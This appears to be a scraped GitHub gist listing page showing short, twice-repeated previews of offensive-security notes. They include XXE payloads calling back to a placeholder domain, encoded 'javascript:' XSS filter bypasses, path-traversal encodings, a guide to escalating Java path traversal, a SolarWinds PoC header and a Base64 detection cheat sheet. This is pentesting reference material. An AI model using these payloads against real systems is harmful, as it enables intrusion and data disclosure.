Arben Shala spenkk

## log4j-keywords
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}

## apk-recon.yaml
id: apk-recon

info:
  name: APK Recon
  author: nullenc0de
  severity: info
  tags: android,file

file:
  - extensions:

## lfi_windows.txt
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

Traversal encoding:
===================
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af

## Solarwinds_Orion_LFD.py
# CVE-2020-10148  (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io

# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464

# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules

## xxe-payloads.txt
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

## href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

## exploit_path_traversals_in_Java_webapps.txt
so, you can read WEB-INF/web.xml. how can you escalate this issue?

[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.

use a specialized wordlist such as the following (from 	Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.

## MongoDB
mongod --version


#MongoDB Default Directory: "/<root>/db/data" viz. "/c/db/data" #OR "<Root>:\db\data" viz. "C:\db\data"
rm -rf "/e/WT" #OR rm -rf "E:\WT"

mkdir -p "/e/WT" #OR mkdir -p "E:\WT"


#MongoDB Server #runserver #mongod -dbpath <Directory>/WT --storageEngine <storage engine>

## List of API endpoints & objects
0
00
01
02
03
1
1.0
10
100
1000

## Base64_CheatSheet.md

      
              1 file
            
          
              43 forks
            
          
              6 comments
            
          
              264 stars
            
          
                Neo23x0
                / Base64_CheatSheet.md
            
            
              Last active
              May 23, 2024 08:25
            
              
                Learning Aid - Top Base64 Encodings Table
              
          
    Base64 Patterns - Learning Aid


Base64 Code
Mnemonic Aid
Decoded*
Description


JAB
🗣 Jabber
$.
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:


TVq
📺 Television
MZ
MZ header


SUVY
🚙 SUV
IEX
PowerShell Invoke Expression


SQBFAF
🐣 Squab favorite
I.E.
PowerShell Invoke Expression (UTF-16)


SQBuAH
🐣 Squab uahhh
I.n.
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz


PAA
💪 "Pah!"
&lt;.
Often used by Emotet (UTF-16)
	${ctx:loginId}
	${map:type}
	${filename}
	${date:MM-dd-yyyy}
	${docker:containerId}
	${docker:containerName}
	${docker:imageName}
	${env:USER}
	${event:Marker}
	${mdc:UserId}
	id: apk-recon

	info:
	name: APK Recon
	author: nullenc0de
	severity: info
	tags: android,file

	file:
	- extensions:
	Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

	Traversal encoding:
	===================
	../
	..\
	..\/
	%2e%2e%2f
	%252e%252e%252f
	%c0%ae%c0%ae%c0%af
	# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
	# @0xSha
	# (C) 2020 0xSha.io

	# Advisory : https://www.solarwinds.com/securityadvisory
	# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
	# Details : https://kb.cert.org/vuls/id/843464

	# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
	# According to SolarWinds.Orion.Web.HttpModules
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)
	so, you can read WEB-INF/web.xml. how can you escalate this issue?

	[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.

	use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
	https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
	with time you can build your own wordlist adding files you've discovered over time.
	use Burp Intruder for this, it's perfect for this job.
	sort Intruder results by status code so you can see instantly which files were found.
	mongod --version


	#MongoDB Default Directory: "/<root>/db/data" viz. "/c/db/data" #OR "<Root>:\db\data" viz. "C:\db\data"
	rm -rf "/e/WT" #OR rm -rf "E:\WT"

	mkdir -p "/e/WT" #OR mkdir -p "E:\WT"


	#MongoDB Server #runserver #mongod -dbpath <Directory>/WT --storageEngine <storage engine>
Base64 Code	Mnemonic Aid	Decoded*	Description
`JAB`	🗣 Jabber	`$.`	Variable declaration (UTF-16), e.g. `JABlAG4AdgA` for `$env:`
`TVq`	📺 Television	`MZ`	MZ header
`SUVY`	🚙 SUV	`IEX`	PowerShell Invoke Expression
`SQBFAF`	🐣 Squab favorite	`I.E.`	PowerShell Invoke Expression (UTF-16)
`SQBuAH`	🐣 Squab uahhh	`I.n.`	PowerShell Invoke string (UTF-16) e.g. `Invoke-Mimikatz`
`PAA`	💪 "Pah!"	`<.`	Often used by Emotet (UTF-16)